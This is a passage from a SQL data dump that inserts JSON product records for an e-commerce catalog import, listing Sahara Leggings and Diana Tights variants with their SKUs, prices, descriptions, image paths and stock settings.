Individually\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sahara-leggings-28-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp05-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp05-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp05-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp05-gray_alt1.jpg,\\/w\\/p\\/wp05-gray_back.jpg\",\"image\":\"\\/w\\/p\\/wp05-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp05-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp05-gray_alt1.jpg,\\/w\\/p\\/wp05-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Gray\"},\"1796\":{\"sku\":\"WP05-28-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Sahara Leggings-28-Red\",\"description\":\"<p>Contrast colors, full-length leggings, and opaque, high-stretch fabric define the Sahara. Flat-locked seams and quick-drying wicking properties prevent chafing. A deep elasticated waistband and carefully positioned seamlines create a flattering silhouette.<\\/p>\\n<p>&bull; Pinstripe legging with rouched ankles.<br \\/>&bull; Secret pocket at waistband.<br \\/>&bull; Flat seams for comfort.<br \\/>&bull; Shaped fit with low rise.<br \\/>&bull; 4-way stretch, moisture-wicking material.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sahara-leggings-28-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp05-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp05-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp05-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp05-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp05-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Red\"},\"1797\":{\"sku\":\"WP05-29-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Sahara Leggings-29-Blue\",\"description\":\"<p>Contrast colors, full-length leggings, and opaque, high-stretch fabric define the Sahara. Flat-locked seams and quick-drying wicking properties prevent chafing. A deep elasticated waistband and carefully positioned seamlines create a flattering silhouette.<\\/p>\\n<p>&bull; Pinstripe legging with rouched ankles.<br \\/>&bull; Secret pocket at waistband.<br \\/>&bull; Flat seams for comfort.<br \\/>&bull; Shaped fit with low rise.<br \\/>&bull; 4-way stretch, moisture-wicking material.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sahara-leggings-29-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp05-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp05-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp05-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp05-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp05-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Blue\"},\"1798\":{\"sku\":\"WP05-29-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Sahara Leggings-29-Gray\",\"description\":\"<p>Contrast colors, full-length leggings, and opaque, high-stretch fabric define the Sahara. Flat-locked seams and quick-drying wicking properties prevent chafing. A deep elasticated waistband and carefully positioned seamlines create a flattering silhouette.<\\/p>\\n<p>&bull; Pinstripe legging with rouched ankles.<br \\/>&bull; Secret pocket at waistband.<br \\/>&bull; Flat seams for comfort.<br \\/>&bull; Shaped fit with low rise.<br \\/>&bull; 4-way stretch, moisture-wicking material.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sahara-leggings-29-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp05-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp05-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp05-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp05-gray_alt1.jpg,\\/w\\/p\\/wp05-gray_back.jpg\",\"image\":\"\\/w\\/p\\/wp05-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp05-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp05-gray_alt1.jpg,\\/w\\/p\\/wp05-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Gray\"},\"1799\":{\"sku\":\"WP05-29-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Sahara Leggings-29-Red\",\"description\":\"<p>Contrast colors, full-length leggings, and opaque, high-stretch fabric define the Sahara. Flat-locked seams and quick-drying wicking properties prevent chafing. A deep elasticated waistband and carefully positioned seamlines create a flattering silhouette.<\\/p>\\n<p>&bull; Pinstripe legging with rouched ankles.<br \\/>&bull; Secret pocket at waistband.<br \\/>&bull; Flat seams for comfort.<br \\/>&bull; Shaped fit with low rise.<br \\/>&bull; 4-way stretch, moisture-wicking material.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sahara-leggings-29-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp05-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp05-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp05-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp05-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp05-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Red\"}}');
INSERT INTO `importexport_importdata` (`id`, `entity`, `behavior`, `data`) VALUES
(19, 'catalog_product', 'append', '{\"1800\":{\"sku\":\"WP05\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Sahara Leggings\",\"description\":\"<p>Contrast colors, full-length leggings, and opaque, high-stretch fabric define the Sahara. Flat-locked seams and quick-drying wicking properties prevent chafing. A deep elasticated waistband and carefully positioned seamlines create a flattering silhouette.<\\/p>\\n<p>&bull; Pinstripe legging with rouched ankles.<br \\/>&bull; Secret pocket at waistband.<br \\/>&bull; Flat seams for comfort.<br \\/>&bull; Shaped fit with low rise.<br \\/>&bull; 4-way stretch, moisture-wicking material.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp05-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp05-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp05-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Leggings|Sweatpants|Track Pants,material=LumaTech&trade;|Organic Cotton,pattern=Solid,climate=Cool|Indoor|Spring,eco_collection=No,performance_fabric=No,erin_recommends=Yes,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WP05-28-Blue,size=28,color=Blue|sku=WP05-28-Gray,size=28,color=Gray|sku=WP05-28-Red,size=28,color=Red|sku=WP05-29-Blue,size=29,color=Blue|sku=WP05-29-Gray,size=29,color=Gray|sku=WP05-29-Red,size=29,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp05-gray_alt1.jpg,\\/w\\/p\\/wp05-gray_back.jpg\",\"image\":\"\\/w\\/p\\/wp05-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp05-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp05-gray_alt1.jpg,\\/w\\/p\\/wp05-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Leggings|Sweatpants|Track Pants\",\"material\":\"LumaTech&trade;|Organic Cotton\",\"pattern\":\"Solid\",\"climate\":\"Cool|Indoor|Spring\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"Yes\",\"new\":\"No\",\"sale\":\"No\"},\"1801\":{\"sku\":\"WP06-28-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Diana Tights-28-Black\",\"description\":\"<p>Perfect for hot bikram session or cool-down stretching. 8-percent stretch means you\'ll feel like anything is possible in the capri-style Diana Tights.<\\/p>\\n<p>&bull; Black legging with slate details.<br \\/>&bull; Flat-lock, chafe-free side seams.<br \\/>&bull; Vented gusset.<br \\/>&bull; Secret interior pocket.<br \\/>&bull; Sustainable and recycled fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"diana-tights-28-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp06-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp06-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp06-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp06-black_alt1.jpg,\\/w\\/p\\/wp06-black_back.jpg,\\/w\\/p\\/wp06-black_outfit.jpg\",\"image\":\"\\/w\\/p\\/wp06-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp06-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp06-black_alt1.jpg,\\/w\\/p\\/wp06-black_back.jpg,\\/w\\/p\\/wp06-black_outfit.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Black\"},\"1802\":{\"sku\":\"WP06-28-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Diana Tights-28-Blue\",\"description\":\"<p>Perfect for hot bikram session or cool-down stretching. 8-percent stretch means you\'ll feel like anything is possible in the capri-style Diana Tights.<\\/p>\\n<p>&bull; Black legging with slate details.<br \\/>&bull; Flat-lock, chafe-free side seams.<br \\/>&bull; Vented gusset.<br \\/>&bull; Secret interior pocket.<br \\/>&bull; Sustainable and recycled fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"diana-tights-28-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp06-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp06-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp06-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp06-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp06-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Blue\"},\"1803\":{\"sku\":\"WP06-28-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Diana Tights-28-Orange\",\"description\":\"<p>Perfect for hot bikram session or cool-down stretching. 8-percent stretch means you\'ll feel like anything is possible in the capri-style Diana Tights.<\\/p>\\n<p>&bull; Black legging with slate details.<br \\/>&bull; Flat-lock, chafe-free side seams.<br \\/>&bull; Vented gusset.<br \\/>&bull; Secret interior pocket.<br \\/>&bull; Sustainable and recycled fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"diana-tights-28-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp06-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp06-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp06-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_